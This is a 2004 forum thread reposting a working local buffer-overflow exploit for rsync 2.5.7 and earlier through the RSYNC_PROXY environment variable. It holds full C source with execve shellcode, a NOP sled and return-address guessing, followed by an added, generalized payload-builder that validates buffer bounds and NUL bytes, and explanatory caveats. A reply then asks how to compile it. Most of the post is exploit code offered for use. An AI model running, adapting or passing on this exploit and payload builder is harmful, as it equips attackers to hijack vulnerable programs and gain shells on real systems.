GaLiaRePt
Feb 24 2004, 06:20 PM
Rsync Buffer Overflow (RSYNC_PROXY Environment Variable) Exploit
Date: 2004-02-24
Author: DownBload <downbload@hotmail.com>
Download:
http://www.security-corporation.com/download/exploit/rsync.c

CODE:

/*
 * This is just a lame PoC rsync <= 2.5.7 local buffer overflow (no root)
 * exploit. Tested on RH 7.3 - Coded (in 5 minutes) by DownBload
 * <downbload@hotmail.com>
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Return the current stack pointer (32-bit x86 only). */
unsigned long get_esp(void)
{
    unsigned long esp;
    __asm__ ("movl %%esp, %0" : "=r" (esp));
    return esp;
}

/* 23-byte Linux/x86 execve("/bin//sh") shellcode. */
char linux_x86_execve[] =
    "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f"
    "\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80";

int main(int argc, char **argv)
{
    unsigned long ret;
    char buffer[512];
    int offset = 1500;  /* for RH 7.3 */
    int dist = 76;      /* bytes from the end of the shellcode to the saved return address */

    if (argc == 2)
        offset = atoi(argv[1]);

    /* NOP sled over the whole buffer, shellcode at offset 400. */
    memset(buffer, 0x90, sizeof(buffer));
    buffer[sizeof(buffer) - 1] = '\0';  /* setenv() needs a terminated string */
    memcpy(buffer + 400, linux_x86_execve, strlen(linux_x86_execve));

    /* Guess where the sled lands in rsync's stack from our own %esp plus an offset. */
    ret = get_esp() + offset;
    printf("RET: 0x%lx\n", ret);

    /* Overwrite the saved return address dist bytes past the shellcode. */
    *(unsigned long *)&buffer[400 + strlen(linux_x86_execve) + dist] = ret;

    /* rsync copies RSYNC_PROXY into a fixed-size stack buffer when a proxy is set. */
    setenv("RSYNC_PROXY", buffer, 1);
    execl("/usr/bin/rsync", "rsync", "localhost::", (char *)NULL);
    perror("execl");
    return 1;
}
Just for fun as well ;-)
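The PoC above builds its environment value by hand and never checks that the pieces fit or that the string survives the trip through setenv() and execve(). The following is an added example, not code from the forum post, from DownBload, or from rsync: a builder for the same sled / shellcode / return-address layout that refuses payloads which would overrun the buffer or contain a NUL byte (a NUL anywhere in the value, including inside the return address, truncates the environment string there, and the rest of the payload never reaches the target). The layout numbers in main() are the PoC's (512-byte buffer, shellcode at 400, return address 76 bytes past it); the struct and function names (payload_layout, build_payload, payload_ret_offset) and the return address 0xbffffa3c are constructed for this example and belong to no real target.

```c
/*
 * Added example (not from the forum post, DownBload, or rsync): a checked
 * builder for the environment-variable payload layout the PoC uses.
 * Names and the sample return address are constructed for illustration.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NOP 0x90

/* Standard 23-byte Linux/x86 execve("/bin//sh") shellcode, as in the PoC. */
static const unsigned char execve_sc[] = {
    0x6a, 0x0b, 0x58, 0x99, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f,
    0x2f, 0x62, 0x69, 0x89, 0xe3, 0x52, 0x53, 0x89, 0xe1, 0xcd, 0x80
};

/* Where things go inside the environment value (hypothetical struct name). */
typedef struct {
    size_t buf_len; /* buffer size, including the terminating NUL */
    size_t sc_off;  /* offset of the shellcode (NOP sled before it) */
    size_t dist;    /* bytes from the end of the shellcode to the return address slot */
} payload_layout;

/* Offset at which the 4-byte return address is written. */
size_t payload_ret_offset(const payload_layout *l, size_t sc_len)
{
    return l->sc_off + sc_len + l->dist;
}

/*
 * Fill out[] (which must hold l->buf_len bytes) with NOP sled, shellcode and
 * little-endian return address, NUL-terminated so setenv() takes all of it.
 * Returns 0 on success or a negative code naming the problem:
 *  -1 buffer too small to hold anything
 *  -2 shellcode would overrun the buffer
 *  -3 return address slot would overrun the buffer
 *  -4 shellcode contains a NUL byte (the env value would be cut there)
 *  -5 return address contains a NUL byte (same problem)
 */
int build_payload(unsigned char *out, const payload_layout *l,
                  const unsigned char *sc, size_t sc_len, uint32_t ret)
{
    size_t usable, ret_off;

    if (l->buf_len < 2)
        return -1;
    usable = l->buf_len - 1;                 /* last byte is the NUL */
    if (l->sc_off > usable || sc_len > usable - l->sc_off)
        return -2;
    ret_off = payload_ret_offset(l, sc_len);
    if (ret_off > usable || sizeof ret > usable - ret_off)
        return -3;
    if (memchr(sc, 0, sc_len) != NULL)
        return -4;
    for (size_t i = 0; i < sizeof ret; i++)
        if (((ret >> (8 * i)) & 0xff) == 0)
            return -5;

    memset(out, NOP, usable);
    memcpy(out + l->sc_off, sc, sc_len);
    for (size_t i = 0; i < sizeof ret; i++)  /* unaligned little-endian store */
        out[ret_off + i] = (unsigned char)((ret >> (8 * i)) & 0xff);
    out[usable] = '\0';
    return 0;
}

int main(void)
{
    payload_layout l = { 512, 400, 76 };     /* the PoC's numbers */
    unsigned char buf[512];
    uint32_t ret = 0xbffffa3cu;              /* constructed example value */
    int rc = build_payload(buf, &l, execve_sc, sizeof execve_sc, ret);

    if (rc != 0) {
        printf("build_payload failed: %d\n", rc);
        return 1;
    }
    printf("ret at offset %zu, env value length %zu\n",
           payload_ret_offset(&l, sizeof execve_sc), strlen((char *)buf));
    return 0;
}
```

Two caveats the PoC leaves implicit: the get_esp() + offset guess only works because a process started by execve() on that kernel got a predictable stack top, so the exploit's own %esp is a usable estimate of rsync's; with stack randomization the return address has to come from elsewhere. And since rsync is not setuid, a successful overflow here runs /bin/sh as the same user who launched it, which is why the post calls it "no root".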
invisible-boy
Feb 24 2004, 07:59 PM
Hi,
where do I compile it?
I can't compile it on Red Hat Linux???